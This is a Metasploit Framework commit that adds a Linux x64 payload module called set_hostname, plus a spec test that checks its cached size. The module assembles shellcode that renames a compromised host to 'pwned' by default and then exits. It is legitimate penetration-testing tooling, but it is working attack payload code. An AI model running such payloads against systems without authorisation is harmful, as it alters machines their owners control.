Land #20334, adds payload linux/x64/set_hostname

msutovsky-r7 · web-flow · commit bc705b8c5aea · 2025-07-06T18:56:43.000+02:00
Add payload/linux/x64/set_hostname module.
diff --git a/modules/payloads/singles/linux/x64/set_hostname.rb b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -0,0 +1,65 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 40
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Set Hostname',
+        'Description' => 'Sets the hostname of the machine.',
+        'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_X64,
+        'Privileged' => true
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
+      ]
+    )
+  end
+
+  def generate(_opts = {})
+    hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
+    length = hostname.length
+    if length > 0xff
+      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
+    end
+
+    payload = %^
+      push 0xffffffffffffff56 ; sethostname() syscall number.
+      pop rax
+      neg rax
+      jmp str
+
+    end:
+      push #{length}
+      pop rsi
+      pop rdi    ; rdi points to the hostname string.
+      xor byte [rdi+rsi], 0x41
+      syscall
+
+      push 60    ; exit() syscall number.
+      pop rax
+      xor rdi,rdi
+      syscall
+
+    str:
+      call end
+      db "#{hostname}A"
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
+  end
+end
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
@@ -2105,6 +2105,16 @@
                           reference_name: 'linux/x64/exec'
   end
 
+  context 'linux/x64/set_hostname' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/x64/set_hostname'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x64/set_hostname'
+  end
+  
   context 'linux/x64/pingback_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
